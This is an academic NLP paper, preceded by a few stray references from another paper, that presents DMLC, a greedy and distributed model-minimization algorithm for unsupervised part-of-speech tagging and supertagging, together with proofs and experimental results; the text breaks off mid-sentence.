Jiaotong University, 2008. [6] Zhang Jun. research and implementation of distributed ESB bus based on SOA Architecture [D]. Nanjing: Nanjing University of technology, 2009. [7] Wang Li, ye Weiquan. Planning and design of Anyan tobacco data center based on SOA Architecture [J]. Computer knowledge and technology, 2013, 1:476-478. [8] Electronic Publication: Digital Object Identifiers (DOIs): [9] Lin Yuqin, Huang Chenhui. Research on ESB framework for enterprise application integration [J]. Computer application, 2010, 6:1658-1660. [10] Ma Ruijuan, he Lili. Research on data exchange service system of tobacco industry based on ESB [J]. Computer programming skills and maintenance, 2013, 6:33-35. work_37wft6eehnazxaxgenjumsuamm ---- Parallel Algorithms for Unsupervised Tagging Sujith Ravi Google Mountain View, CA 94043 sravi@google.com Sergei Vassilivitskii Google Mountain View, CA 94043 sergeiv@google.com Vibhor Rastogi∗ Twitter San Francisco, CA vibhor.rastogi@gmail.com Abstract We propose a new method for unsupervised tagging that finds minimal models which are then further improved by Expectation Max- imization training. In contrast to previous approaches that rely on manually specified and multi-step heuristics for model minimiza- tion, our approach is a simple greedy approx- imation algorithm DMLC (DISTRIBUTED- MINIMUM-LABEL-COVER) that solves this objective in a single step. We extend the method and show how to ef- ficiently parallelize the algorithm on modern parallel computing platforms while preserving approximation guarantees. The new method easily scales to large data and grammar sizes, overcoming the memory bottleneck in previ- ous approaches. We demonstrate the power of the new algorithm by evaluating on various sequence labeling tasks: Part-of-Speech tag- ging for multiple languages (including low- resource languages), with complete and in- complete dictionaries, and supertagging, a complex sequence labeling task, where the grammar size alone can grow to millions of entries. Our results show that for all of these settings, our method achieves state-of-the-art scalable performance that yields high quality tagging outputs. 1 Introduction Supervised sequence labeling with large labeled training datasets is considered a solved problem. For ∗∗The research described herein was conducted while the author was working at Google. instance, state of the art systems obtain tagging ac- curacies over 97% for part-of-speech (POS) tagging on the English Penn Treebank. However, learning accurate taggers without labeled data remains a chal- lenge. The accuracies quickly drop when faced with data from a different domain, language, or when there is very little labeled information available for training (Banko and Moore, 2004). Recently, there has been an increasing amount of research tackling this problem using unsuper- vised methods. A popular approach is to learn from POS-tag dictionaries (Merialdo, 1994), where we are given a raw word sequence and a dictionary of legal tags for each word type. Learning from POS- tag dictionaries is still challenging. Complete word- tag dictionaries may not always be available for use and in every setting. When they are available, the dictionaries are often noisy, resulting in high tag- ging ambiguity. Furthermore, when applying tag- gers in new domains or different datasets, we may encounter new words that are missing from the dic- tionary. There have been some efforts to learn POS taggers from incomplete dictionaries by extending the dictionary to include these words using some heuristics (Toutanova and Johnson, 2008) or using other methods such as type-supervision (Garrette and Baldridge, 2012). In this work, we tackle the problem of unsuper- vised sequence labeling using tag dictionaries. The first reported work on this problem was on POS tag- ging from Merialdo (1994). The approach involved training a standard Hidden Markov Model (HMM) using the Expectation Maximization (EM) algo- rithm (Dempster et al., 1977), though EM does not perform well on this task (Johnson, 2007). More re- cent methods have yielded better performance than EM (see (Ravi and Knight, 2009) for an overview). One interesting line of research introduced by Ravi and Knight (2009) explores the idea of per- forming model minimization followed by EM train- ing to learn taggers. Their idea is closely related to the classic Minimum Description Length princi- ple for model selection (Barron et al., 1998). They (1) formulate an objective function to find the small- est model that explains the text (model minimization step), and then, (2) fit the minimized model to the data (EM step). For POS tagging, this method (Ravi and Knight, 2009) yields the best performance to date; 91.6% tagging accuracy on a standard test dataset from the English Penn Treebank. The orig- inal work from (Ravi and Knight, 2009) uses an in- teger linear programming (ILP) formulation to find minimal models, an approach which does not scale to large datasets. Ravi et al. (2010b) introduced a two-step greedy approximation to the original ob- jective function (called the MIN-GREEDY algo- rithm) that runs much faster while maintaining the high tagging performance. Garrette and Baldridge (2012) showed how to use several heuristics to fur- ther improve this algorithm (for instance, better choice of tag bigrams when breaking ties) and stack other techniques on top, such as careful initialization of HMM emission models which results in further performance gains. Their method also works un- der incomplete dictionary scenarios and can be ap- plied to certain low-resource scenarios (Garrette and Baldridge, 2013) by combining model minimization with supervised training. In this work, we propose a new scalable algorithm for performing model minimization for this task. By making an assumption on the structure of the solu- tion, we prove that a variant of the greedy set cover algorithm always finds an approximately optimal la- bel set. This is in contrast to previous methods that employ heuristic approaches with no guarantee on the quality of the solution. In addition, we do not have to rely on ad hoc tie-breaking procedures or careful initializations for unknown words. Finally, not only is the proposed method approximately op- timal, it is also easy to distribute, allowing it to eas- ily scale to very large datasets. We show empirically that our method, combined with an EM training step outperforms existing state of the art systems. 1.1 Our Contributions • We present a new method, DISTRIBUTED MINIMUM LABEL COVER, DMLC, for model minimization that uses a fast, greedy algorithm with formal approximation guarantees to the quality of the solution. • We show how to efficiently parallelize the al- gorithm while preserving approximation guar- antees. In contrast, existing minimization ap- proaches cannot match the new distributed al- gorithm when scaling from thousands to mil- lions or even billions of tokens. • We show that our method easily scales to both large data and grammar sizes, and does not re- quire the corpus or label set to fit into memory. This allows us to tackle complex tagging tasks, where the tagset consists of several thousand labels, which results in more than one million entires in the grammar. • We demonstrate the power of the new method by evaluating under several differ- ent scenarios—POS tagging for multiple lan- guages (including low-resource languages), with complete and incomplete dictionaries, as well as a complex sequence labeling task of su- pertagging. Our results show that for all these settings, our method achieves state-of-the-art performance yielding high quality taggings. 2 Related Work Recently, there has been an increasing amount of research tackling this problem from multiple di- rections. Some efforts have focused on inducing POS tag clusters without any tags (Christodoulopou- los et al., 2010; Reichart et al., 2010; Moon et al., 2010), but evaluating such systems proves dif- ficult since it is not straightforward to map the clus- ter labels onto gold standard tags. A more pop- ular approach is to learn from POS-tag dictionar- ies (Merialdo, 1994; Ravi and Knight, 2009), incom- plete dictionaries (Hasan and Ng, 2009; Garrette and Baldridge, 2012) and human-constructed dictionar- ies (Goldberg et al., 2008). Another direction that has been explored in the past includes bootstrapping taggers for a new lan- guage based on information acquired from other lan- guages (Das and Petrov, 2011) or limited annota- tion resources (Garrette and Baldridge, 2013). Ad- ditional work focused on building supervised tag- gers for noisy domains such as Twitter (Gimpel et al., 2011). While most of the relevant work in this area centers on POS tagging, there has been some work done for building taggers for more complex sequence labeling tasks such as supertagging (Ravi et al., 2010a). Other related work include alternative methods for learning sparse models via priors in Bayesian in- ference (Goldwater and Griffiths, 2007) and poste- rior regularization (Ganchev et al., 2010). But these methods only encourage sparsity and do not explic- itly seek to minimize the model size, which is the ob- jective function used in this work. Moreover, taggers learned using model minimization have been shown to produce state-of-the-art results for the problems discussed here. 3 Model Following Ravi and Knight (2009), we formulate the problem as that of label selection on the sentence graph. Formally, we are given a set of sequences, S = {S1,S2, . . . ,Sn} where each Si is a sequence of words, Si = wi1,wi2, . . . ,wi,|Si|. With each word wij we associate a set of possible tags Tij. We will denote by m the total number of (possibly du- plicate) words (tokens) in the corpus. Additionally, we define two special words w0 and w∞ with special tags start and end, and consider the modified sequences S′i = w0,Si,w∞. To sim- plify notation, we will refer to w∞ = w|Si|+1. The sequence label problem asks us to select a valid tag tij ∈ Tij for each word wij in the input to minimize a specific objective function. We will refer to a tag pair (ti,j−1, tij) as a label. Our aim is to minimize the number of distinct labels used to cover the full input. Formally, given a se- quence S′i and a tag tij for each word wij in S ′ i, let the induced set of labels for sequence S′i be Li = |S′i|⋃ j=1 {(ti,j−1, tij)}. The total number of distinct labels used over all se- quences is then φ = ∣∣∪i Li| = ∣∣⋃ i |Si|+1⋃ j=1 {(ti,j−1, tij)}|. Note that the order of the tokens in the label makes a difference as {(NN, VP)} and {(VP, NN)} are two distinct labels. Now we can define the problem formally, follow- ing (Ravi and Knight, 2009). Problem 1 (Minimum Label Cover). Given a set S of sequences of words, where each word wij has a set of valid tags Tij, the problem is to find a valid tag assignment tij ∈ Tij for each word that minimizes the number of distinct labels or tag pairs over all sequences, φ = ∣∣⋃ i ⋃|Si|+1 j=1 {(ti,j−1, tij)}| . The problem is closely related to the classical Set Cover problem and is also NP-complete. To reduce Set Cover to the label selection problem, map each element i of the Set Cover instance to a single word sentence Si = wi1, and let the valid tags Ti1 con- tain the names of the sets that contain element i. Consider a solution to the label selection problem; every sentence Si is covered by two labels (w0,ki) and (ki,w∞), for some ki ∈ Ti1, which corresponds to an element i being covered by set ki in the Set Cover instance. Thus any valid solution to the label selection problem leads to a feasible solution to the Set Cover problem ({k1,k2, . . .}) of exactly half the size. Finally, we will use {{. . .}} notation to denote a multiset of elements, i.e. a set where an element may appear multiple times. 4 Algorithm In this Section, we describe the DISTRIBUTED- MINIMUM-LABEL-COVER, DMLC, algorithm for approximately solving the minimum label cover problem. We describe the algorithm in a central- ized setting, and defer the distributed implementa- tion to Section 5. Before describing the algorithm, we briefly explain the relationship of the minimum label cover problem to set cover. 4.1 Modification of Set Cover As we pointed out earlier, the minimum label cover problem is at least as hard as the Set Cover prob- 1: Input: A set of sequences S with each words wij having possible tags Tij. 2: Output: A tag assignment tij ∈ Tij for each word wij approximately minimizing labels. 3: Let M be the multi set of all possible labels generated by choosing each possible tag t ∈ Tij. M = ⋃ i   |Si|+1⋃ j=1 ⋃ t′∈Ti,j−1 t∈Tij {{(t′, t)}}   (1) 4: Let L = ∅ be the set of selected labels. 5: repeat 6: Select the most frequent label not yet se- lected: (t′, t) = arg max(s′,s)/∈L |M ∩ (s′,s)|. 7: For each bigram (wi,j−1,wij) where t′ ∈ Ti,j−1 and t ∈ Tij tentatively assign t′ to wi,j−1 and t to wij. Add (t′, t) to L. 8: If a word gets two assignments, select one at random with equal probability. 9: If a bigram (wij,wi,j+1) is consistent with assignments in (t,t′), fix the tenta- tive assignments, and set Ti,j−1 = {t′} and Tij = t. Recompute M, the multi- set of possible labels, with the updated Ti,j−1 and Tij. 10: until there are no unassigned words Algorithm 1: MLC Algorithm 1: Input: A set of sequences S with each words wij having possible tags Tij. 2: Output: A tag assignment tij ∈ Tij for each word wij approximately minimizing labels. 3: (Graph Creation) Initialize each vertex vij with the set of possible tags Tij and its neighbors vi,j+1 and vi,j−1. 4: repeat 5: (Message Passing) Each vertex vij sends its pos- sibly tags Tij to its forward neighbor vij+1. 6: (Counter Update) Each vertex receives the the tags Ti,j−1 and adds all possible labels {(s,s′)|s ∈ Ti,j−1,s′ ∈ Tij} to a global counter (M). 7: (MaxLabel Selection) Each vertex queries the global counter M to find the maximum label (t,t′). 8: (Tentative Assignment) Each vertex vij selects a tag tentatively as follows: If one of the tags t,t′ is in the feasible set Tij, it tentatively selects the tag. 9: (Random Assignment) If both are feasible it se- lects one at random. The vertex communicates its assignment to its neighbors. 10: (Confirmed Assignment) Each vertex receives the tentative assignment from its neighbors. If together with its neighbors it can match the se- lected label, the assignment is finalized. If the assigned tag is T , then the vertex vij sets the valid tag set Tij to {t}. 11: until no unassigned vertices exist. Algorithm 2: DMLC Implementation lem. An additional challenge comes from the fact that labels are tags for a pair of words, and hence are related. For example, if we label a word pair (wi,j−1,wij) as (NN, VP), then the label for the next word pair (wij,wi,j+1) has to be of the form (VP, *), i.e., it has to start with VP. Previous work (Ravi et al., 2010a; Ravi et al., 2010b) recognized this challenge and employed two phase heuristic approaches. Eschewing heuristics, we will show that with one natural assumption, even with this extra set of constraints, the standard greedy algorithm for this problem results in a solution with a provable approximation ratio of O(log m). In practice, however, the algorithm performs far better than the worst case ratio, and similar to the work of (Gomes et al., 2006), we find that the greedy approach selects a cover approximately 11% worse than the optimum solution. 4.2 MLC Algorithm We present in Algorithm 1 our MINIMUM LABEL COVER algorithm to approximately solve the mini- mum label cover problem. The algorithm is simple, efficient, and easy to distribute. The algorithm chooses labels one at a time, select- ing a label that covers as many words as possible in every iteration. For this, it generates and maintains a multi-set of all possible labels M (Step 3). The multi-set contains an occurrence of each valid label, for example, if wi,j−1 has two possible valid tags NN and VP, and wij has one possible valid tag VP, then M will contain two labels, namely (NN, VP) and (VP, VP). Since M is a multi-set it will contain duplicates, e.g. the label (NN, VP) will appear for each adjacent pair of words that have NN and VP as valid tags, respectively. In each iteration, the algorithm picks a label with the most number of occurrences in M and adds it to the set of chosen labels (Step 6). Intuitively, this is a greedy step to select a label that covers the most number of word pairs. Once the algorithm picks a label (t′, t), it tries to assign as many words to tags t or t′ as possible (Step 7). A word can be assigned t′ if t′ is a valid tag for it, and t a valid tag for the next word in sequence. Similarly, a word can be assigned t, if t is a valid tag for it, and t′ a valid tag for the previous word. Some words can get both assignments, in which case we choose one tentatively at random (Step 8). If a word’s tentative random tag, say t, is consistent with the choices of its adjacent words (say t′ from the previous word), then the tentative choice is fixed as a permanent one. Whenever a tag is selected, the set of valid tags Tij for the word is reduced to a sin- gleton {t}. Once the set of valid tags Tij changes, the multi-set M of all possible labels also changes, as seen from Eq 1. The multi-set is then recom- puted (Step 9) and the iterations repeated until all of words have been tagged. We can show that under a natural assumption this simple algorithm is approximately optimal. Assumption 1 (c-feasibility). Let c ≥ 1 be any num- ber, and k be the size of the optimal solution to the original problem. In each iteration, the MLC algo- rithm fixes the tags for some words. We say that the algorithm is c-feasible, if after each iteration there exists some solution to the remaining problem, con- sistent with the chosen tags, with size at most ck . The assumption encodes the fact that a single bad greedy choice is not going to destroy the overall structure of the solution, and a nearly optimal so- lution remains. We note that this assumption of c- feasibility is not only sufficient, as we will formally show, but is also necessary. Indeed, without any as- sumptions, once the algorithm fixes the tag for some words, an optimal label may no longer be consis- tent with the chosen tags, and it is not hard to find contrived examples where the size of the optimal so- lution doubles after each iteration of MLC. Since the underlying problem is NP-complete, it is computationally hard to give direct evidence ver- ifying the assumption on natural language inputs. However, on small examples we are able to show that the greedy algorithm is within a small constant factor of the optimum, specifically it is within 11% of the optimum model size for the POS tagging problem using the standard 24k dataset (Ravi and Knight, 2009). Combined with the fact that the final method outperforms state of the art approaches, this leads us to conclude that the structural assumption is well justified. Lemma 1. Under the assumption of c-feasibility, the MLC algorithm achieves a O(c log m) approx- imation to the minimum label cover problem, where m = ∑ i |Si| is the total number of tokens. Proof. To prove the Lemma we will define an objec- tive function φ̄, counting the number of unlabeled word pairs, as a function of possible labels, and show that φ̄ decreases by a factor of (1−O(1/ck)) at every iteration. To define φ̄, we first define φ, the number of la- beled word pairs. Consider a particular set of la- bels, L = {L1,L2, . . . ,Lk} where each label is a pair (ti, tj). Call {tij} a valid assignment of to- kens if for each wij, we have tij ∈ Tij. Then the score of L under an assignment t, which we denote by φt, is the number of bigram labels that appear in L. Formally, φt(L) = | ∪i,j {{(ti,j−1, tij) ∩L}}|. Finally, we define φ(L) to be the best such assign- ment, φ(L) = maxt φt(L), and φ̄(L) = m−φ(L) the number of uncovered labels. Consider the label selected by the algorithm in ev- ery step. By the c-feasibility assumption, there ex- ists some solution having ck labels. Thus, some la- bel from that solution covers at least a 1/ck fraction of the remaining words. The selected label (t,t′) maximizes the intersection with the remaining fea- sible labels. The conflict resolution step ensures that in expectation the realized benefit is at least a half of the maximum, thereby reducing φ̄ by at least a (1 − 1/2ck) fraction. Therefore, after O(kc log m) operations all of the labels are covered. 4.3 Fitting the Model Using EM Once the greedy algorithm terminates and returns a minimized grammar of tag bigrams, we follow the approach of Ravi and Knight (2009) and fit the min- imized model to the data using the alternating EM strategy. In this step, we run an alternating optimization procedure iteratively in phases. In each phase, we initialize (and prune away) parameters within the two HMM components (transition or emission model) using the output from the previous phase. We initialize this procedure by restricting the tran- sition parameters to only those tag bigrams selected in the model minimization step. We train in con- junction with the original emission model using EM algorithm which prunes away some of the emission parameters. In the next phase, we alternate the ini- tialization by choosing the pruned emission model along with the original transition model (with full set of tag bigrams) and retrain using EM. The alter- nating EM iterations are terminated when the change in the size of the observed grammar (i.e., the number of unique bigrams in the tagging output) is ≤ 5%.1 We refer to our entire approach using greedy mini- mization followed by EM training as DMLC + EM. 5 Distributed Implementation The DMLC algorithm is directly suited towards parallelization across many machines. We turn to Pregel (Malewicz et al., 2010), and its open source version Giraph (Apa, 2013). In these systems the computation proceeds in rounds. In every round, ev- ery machine does some local processing and then sends arbitrary messages to other machines. Se- mantically, we think of the communication graph as fixed, and in each round each vertex performs some local computation and then sends messages to its neighbors. This mode of parallel programming di- rects the programmers to “Think like a vertex.” The specific systems like Pregel and Giraph build infrastructure that ensures that the overall system 1For more details on the alternating EM strategy and how initialization with minimized models improve EM performance in alternating iterations, refer to (Ravi and Knight, 2009). is fault tolerant, efficient, and fast. In addition, they provide implementation of commonly used dis- tributed data structures, such as, for example global counters. The programmer’s job is simply to specify the code that each vertex will run at every round. We implemented the DMLC algorithm in Pregel. The implementation is straightforward and given in Algorithm 2. The multi-set M of Algorithm 1 is represented as a global counter in Algorithm 2. The message passing (Step 3) and counter update (Step 4) steps update this global counter and hence per- form the role of Step 3 of Algorithm 1. Step 5 se- lects the label with largest count, which is equivalent to the greedy label picking step 6 of Algorithm 1. Fi- nally steps 6, 7, and 8 update the tag assignment of each vertex performing the roles of steps 7, 8, and 9, respectively, of Algorithm 1. 5.1 Speeding up the Algorithm The implementation described above directly copies the sequential algorithm. Here we describe addi- tional steps we took to further improve the parallel running times. Singleton Sets: As the parallel algorithm pro- ceeds, the set of feasible sets associated with a node slowly decreases. At some point there is only one tag that a node can take on, however this tag is rare, and so it takes a while for it to be selected using the greedy strategy. Nevertheless, if a node and one of its neighbors have only a single tag left, then it is safe to assign the unique label 2. Modifying the Graph: As is often the case, the bottleneck in parallel computations is the commu- nication. To reduce the amount of communication we reduce the graph on the fly, removing nodes and edges once they no longer play a role in the compu- tation. This simple modification decreases the com- munication time in later rounds as the total size of the problem shrinks. 6 Experiments and Results In this Section, we describe the experimental setup for various tasks, settings and compare empirical performance of our method against several existing 2We must judiciously initialize the global counter to take care of this assignment, but this is easily accomplished. baselines. The performance results for all systems (on all tasks) are measured in terms of tagging accu- racy, i.e. % of tokens from the test corpus that were labeled correctly by the system. 6.1 Part-of-Speech Tagging Task 6.1.1 Tagging Using a Complete Dictionary Data: We use a standard test set (consisting of 24,115 word tokens from the Penn Treebank) for the POS tagging task. The tagset consists of 45 dis- tinct tag labels and the dictionary contains 57,388 word/tag pairs derived from the entire Penn Tree- bank. Per-token ambiguity for the test data is about 1.5 tags/token. In addition to the standard 24k dataset, we also train and test on larger data sets— 973k tokens from the Penn Treebank, 3M tokens from PTB+Europarl (Koehn, 2005) data. Methods: We evaluate and compare performance for POS tagging using four different methods that employ the model minimization idea combined with EM training: • EM: Training a bigram HMM model using EM algorithm (Merialdo, 1994). • ILP + EM: Minimizing grammar size using integer linear programming, followed by EM training (Ravi and Knight, 2009). • MIN-GREEDY + EM: Minimizing grammar size using the two-step greedy method (Ravi et al., 2010b). • DMLC + EM: This work. Results: Table 1 shows the results for POS tag- ging on English Penn Treebank data. On the smaller test datasets, all of the model minimization strate- gies (methods 2, 3, 4) tend to perform equally well, yielding state-of-the-art results and large improve- ment over standard EM. When training (and testing) on larger corpora sizes, DMLC yields the best re- ported performance on this task to date. A major advantage of the new method is that it can easily scale to large corpora sizes and the distributed na- ture of the algorithm still permits fast, efficient op- timization of the global objective function. So, un- like the earlier methods (such as MIN-GREEDY) it is fast enough to run on several millions of tokens to yield additional performance gains (shown in last column). Speedups: We also observe a significant speedup when using the parallelized version of the DMLC algorithm. Performing model minimization on the 24k tokens dataset takes 55 seconds on a single ma- chine, whereas parallelization permits model mini- mization to be feasible even on large datasets. Fig 1 shows the running time for DMLC when run on a cluster of 100 machines. We vary the input data size from 1M word tokens to about 8M word tokens, while holding the resources constant. Both the algo- rithm and its distributed implementation in DMLC are linear time operations as evident by the plot. In fact, for comparison, we also plot a straight line passing through the first two runtimes. The straight line essentially plots runtimes corresponding to a linear speedup. DMLC clearly achieves better run- times showing even better than linear speedup. The reason for this is that distributed version has a con- stant overhead for initialization, independent of the data size. While the running time for rest of the im- plementation is linear in data size. Thus, as the data size becomes larger, the constant overhead becomes less significant, and the distributed implementation appears to complete slightly faster as data size in- creases. Figure 1: Runtime vs. data size (measured in # of word tokens) on 100 machines. For comparison, we also plot a straight line passing through the first two runtimes. The straight line essentially plots runtimes corresponding to a linear speedup. DMLC clearly achieves better runtimes showing a better than linear speedup. 6.1.2 Tagging Using Incomplete Dictionaries We also evaluate our approach for POS tagging under other resource-constrained scenarios. Obtain- Method Tagging accuracy (%) te=24k te=973k tr=24k tr=973k tr=3.7M 1. EM 81.7 82.3 2. ILP + EM (Ravi and Knight, 2009) 91.6 3. MIN-GREEDY + EM (Ravi et al., 2010b) 91.6 87.1 4. DMLC + EM (this work) 91.4 87.5 87.8 Table 1: Results for unsupervised part-of-speech tagging on English Penn Treebank dataset. Tagging accuracies for different methods are shown on multiple datasets. te shows the size (number of tokens) in the test data, tr represents the size of the raw text used to perform model minimization. ing a complete dictionary is often difficult, espe- cially for new domains. To verify the utility of our method when the input dictionary is incomplete, we evaluate against standard datasets used in previous work (Garrette and Baldridge, 2012) and compare against the previous best reported performance for the same task. In all the experiments (described here and in subsequent sections), we use the fol- lowing terminology—raw data refers to unlabeled text used by different methods (for model minimiza- tion or other unsupervised training procedures such as EM), dictionary consists of word/tag entries that are legal, and test refers to data over which tagging evaluation is performed. English Data: For English POS tagging with in- complete dictionary, we evaluate on the Penn Tree- bank (Marcus et al., 1993) data. Following (Garrette and Baldridge, 2012), we extracted a word-tag dic- tionary from sections 00-15 (751,059 tokens) con- sisting of 39,087 word types, 45,331 word/tag en- tries, a per-type ambiguity of 1.16 yielding a per- token ambiguity of 2.21 on the raw corpus (treating unknown words as having all 45 possible tags). As in their setup, we then use the first 47,996 tokens of section 16 as raw data and perform final evalua- tion on the sections 22-24. We use the raw corpus along with the unlabeled test data to perform model minimization and EM training. Unknown words are allowed to have all possible tags in both these pro- cedures. Italian Data: The minimization strategy pre- sented here is a general-purpose method that does not require any specific tuning and works for other languages as well. To demonstrate this, we also per- form evaluation on a different language (Italian) us- ing the TUT corpus (Bosco et al., 2000). Follow- ing (Garrette and Baldridge, 2012), we use the same data splits as their setting. We take the first half of each of the five sections to build the word-tag dic- tionary, the next quarter as raw data and the last quarter as test data. The dictionary was constructed from 41,000 tokens comprised of 7,814 word types, 8,370 word/tag pairs, per-type ambiguity of 1.07 and a per-token ambiguity of 1.41 on the raw data. The raw data consisted of 18,574 tokens and the test con- tained 18,763 tokens. We use the unlabeled corpus from the raw and test data to perform model mini- mization followed by unsupervised EM training. Other Languages: In order to test the effective- ness of our method in other non-English settings, we also report the performance of our method on sev- eral other Indo-European languages using treebank data from CoNLL-X and CoNLL-2007 shared tasks on dependency parsing (Buchholz and Marsi, 2006; Nivre et al., 2007). The corpus statistics for the five languages (Danish, Greek, Italian, Portuguese and Spanish) are listed below. For each language, we construct a dictionary from the raw training data. The unlabeled corpus from the raw training and test data is used to perform model minimization fol- lowed by unsupervised EM training. As before, un- known words are allowed to have all possible tags. We report the final tagging performance on the test data and compare it to baseline EM. Garrette and Baldridge (2012) treat unknown words (words that appear in the raw text but are missing from the dictionary) in a special manner and use several heuristics to perform better initialization for such words (for example, the probability that an unknown word is associated with a particular tag is conditioned on the openness of the tag). They also use an auto-supervision technique to smooth counts learnt from EM onto new words encountered dur- ing testing. In contrast, we do not apply any such technique for unknown words and allow them to be mapped uniformly to all possible tags in the dictio- nary. For this particular set of experiments, the only difference from the Garrette and Baldridge (2012) setup is that we include unlabeled text from the test data (but without any dictionary tag labels or special heuristics) to our existing word tokens from raw text for performing model minimization. This is a stan- dard practice used in unsupervised training scenar- ios (for example, Bayesian inference methods) and in general for scalable techniques where the goal is to perform inference on the same data for which one wishes to produce some structured prediction. Language Train Dict Test (tokens) (entries) (tokens) DANISH 94386 18797 5852 GREEK 65419 12894 4804 ITALIAN 71199 14934 5096 PORTUGUESE 206678 30053 5867 SPANISH 89334 17176 5694 Results: Table 2 (column 2) compares previously reported results against our approach for English. We observe that our method obtains a huge improve- ment over standard EM and gets comparable results to the previous best reported scores for the same task from (Garrette and Baldridge, 2012). It is encourag- ing to note that the new system achieves this per- formance without using any of the carefully-chosen heuristics employed by the previous method. How- ever, we do note that some of these techniques can be easily combined with our method to produce fur- ther improvements. Table 2 (column 3) also shows results on Ital- ian POS tagging. We observe that our method achieves significant improvements in tagging accu- racy over all the baseline systems including the pre- vious best system (+2.9%). This demonstrates that the method generalizes well to other languages and produces consistent tagging improvements over ex- isting methods for the same task. Results for POS tagging on CoNLL data in five different languages are displayed in Figure 2. Note that the proportion of raw data in test versus train 50 60 70 80 90 DANISH GREEK ITALIAN PORTUGUESE SPANISH 79.4 66.3 84.6 80.1 83.1 77.8 65.6 82 78.5 81.3 EM DMLC+EM �� Figure 2: Part-of-Speech tagging accuracy for different languages on CoNLL data using incomplete dictionaries. (from the standard CoNLL shared tasks) is much smaller compared to the earlier experimental set- tings. In general, we observe that adding more raw data for EM training improves the tagging quality (same trend observed earlier in Table 1: column 2 versus column 3). Despite this, DMLC + EM still achieves significant improvements over the baseline EM system on multiple languages (as shown in Fig- ure 2). An additional advantage of the new method is that it can easily scale to larger corpora and it pro- duces a much more compact grammar that can be efficiently incorporated for EM training. 6.1.3 Tagging for Low-Resource Languages Learning part-of-speech taggers for severely low- resource languages (e.g., Malagasy) is very chal- lenging. In addition to scarce (token-supervised) labeled resources, the tag dictionaries avail- able for training taggers are tiny compared to other languages such as English. Garrette and Baldridge (2013) combine various supervised and semi-supervised learning algorithms into a common POS tagger training pipeline to addresses some of these challenges. They also report tagging accuracy improvements on low-resource languages when us- ing the combined system over any single algorithm. Their system has four main parts, in order: (1) Tag dictionary expansion using label propagation algo- rithm, (2) Weighted model minimization, (3) Ex- pectation maximization (EM) training of HMMs us- ing auto-supervision, (4) MaxEnt Markov Model (MEMM) training. The entire procedure results in a trained tagger model that can then be applied to tag any raw data.3 Step 2 in this procedure involves 3For more details, refer (Garrette and Baldridge, 2013). Method Tagging accuracy (%) English (PTB 00-15) Italian (TUT) 1. Random 63.53 62.81 2. EM 69.20 60.70 3. Type-supervision + HMM initialization (Garrette and Baldridge, 2012) 88.52 72.86 4. DMLC + EM (this work) 88.11 75.79 Table 2: Part-of-Speech tagging accuracy using PTB sections 00-15 and TUT to build the tag dictionary. For compar- ison, we also include the results for the previously reported state-of-the-art system (method 3) for the same task. Method Tagging accuracy (%) Total Known Unknown Low-resource tagging using (Garrette and Baldridge, 2013) 80.7 (70.2) 87.6 (90.3) 66.1 (45.1) Low-resource tagging using DMLC + EM (this work) 81.1 (70.8) 87.9 (90.3) 66.7 (46.5) Table 3: Part-of-Speech tagging accuracy for a low-resource language (Malagasy) on All/Known/Unknown tokens in the test data. Tagging performance is shown for multiple experiments using different (incomplete) dictionary sizes: (a) small, (b) tiny (shown in parentheses). The new method (row 2) significantly outperforms the existing method with p < 0.01 for small dictionary and p < 0.05 for tiny dictionary. a weighted version of model minimization which uses the multi-step greedy approach from Ravi et al. (2010b) enhanced with additional heuristics that uses tag weights learnt via label propagation (in Step 1) within the minimization process. We replace the model minimization procedure in their Step 2 with our method (DMLC + EM) and di- rectly compare this new system with their approach in terms of tagging accuracy. Note for all other steps in the pipeline we follow the same procedure (and run the same code) as Garrette and Baldridge (2013), including the same smoothing procedure for EM ini- tialization in Step 3. Data: We use the exact same setup as Garrette and Baldridge (2013) and run experiments on Mala- gasy, an Austronesian language spoken in Madagas- car. We use the publicly available data4: 100k raw tokens for training, a word-tag dictionary acquired with 4 hours of human annotation effort (used for type-supervision), and a held-out test dataset (5341 tokens). We provide the unlabeled corpus from the raw training data along with the word-tag dictionary as input to model minimization and evaluate on the test corpus. We run multiple experiments for dif- ferent (incomplete) dictionary scenarios: (a) small = 2773 word/tag pairs, (b) tiny = 329 word/tag pairs. Results: Table 3 shows results on Malagasy data comparing a system that employs (unweighted) 4github.com/ dhgarrette/low-resource-pos-tagging-2013 DMLC against the existing state-of-the-art system that incorporates a multi-step weighted model min- imization combined with additional heuristics. We observe that switching to the new model minimiza- tion procedure alone yields significant improvement in tagging accuracy under both dictionary scenarios. It is encouraging that a better minimization proce- dure also leads to higher tagging quality on the un- known word tokens (column 4 in the table), even when the input dictionary is tiny. 6.2 Supertagging Compared to POS tagging, a more challenging task is learning supertaggers for lexicalized grammar formalisms such as Combinatory Categorial Gram- mar (CCG) (Steedman, 2000). For example, CCG- bank (Hockenmaier and Steedman, 2007) contains 1241 distinct supertags (lexical categories) and the most ambiguous word has 126 supertags. This pro- vides a much more challenging starting point for the semi-supervised methods typically applied to the task. Yet, this is an important task since cre- ating grammars and resources for CCG parsers for new domains and languages is highly labor- and knowledge-intensive. As described earlier, our approach scales easily to large datasets as well as label sizes. To evaluate it on the supertagging task, we use the same dataset from (Ravi et al., 2010a) and compare against their base- line method that uses an modified (two-step) version Method Supertagging accuracy (%) Ambiguous Total 1. EM 38.7 45.6 2. ILP∗ + EM (Ravi et al., 2010a) 52.1 57.3 3. DMLC + EM (this work) 55.9 59.3 Table 4: Results for unsupervised supertagging with a dictionary. Here, we report the total accuracy as well as accuracy on just the ambiguous tokens (i.e., tokens which have more than one tagging possibility). ∗The baseline method 2 requires several pre-processing steps in order to run feasibly for this task (described in Section 6.2). In contrast, the new approach (DMLC) runs fast and also permits efficient parallelization. of the ILP formulation for model minimization. Data: We use the CCGbank data for this ex- periment. This data was created by semi- auto- matically converting the Penn Treebank to CCG derivations (Hockenmaier and Steedman, 2007). We use the standard splits of the data used in semi- supervised tagging experiments (Banko and Moore, 2004)—sections 0-18 for training (i.e., to construct the word-tag dictionary), and sections 22-24 for test. Results: Table 4 compares the results for two baseline systems—standard EM (method 1), and a previously reported system using model minimiza- tion (method 2) for the same task. We observe that DMLC produces better taggings than either of these and yields significant improvement in accu- racy (+2% overall, +3.8% on ambiguous tokens). Note that it is not feasible to run the ILP-based baseline (method 2 in the table) directly since it is very slow in practice, so Ravi et al. (2010a) use a set of pre-processing steps to prune the original grammar size (unique tag pairs) from >1M to sev- eral thousand entries followed by a modified two- step ILP minimization strategy. This is required to permit their model minimization step to be run in a feasible manner. On the other hand, the new ap- proach DMLC (method 3) scales better even when the data/label sizes are large, hence it can be run with the full data using the original model minimization 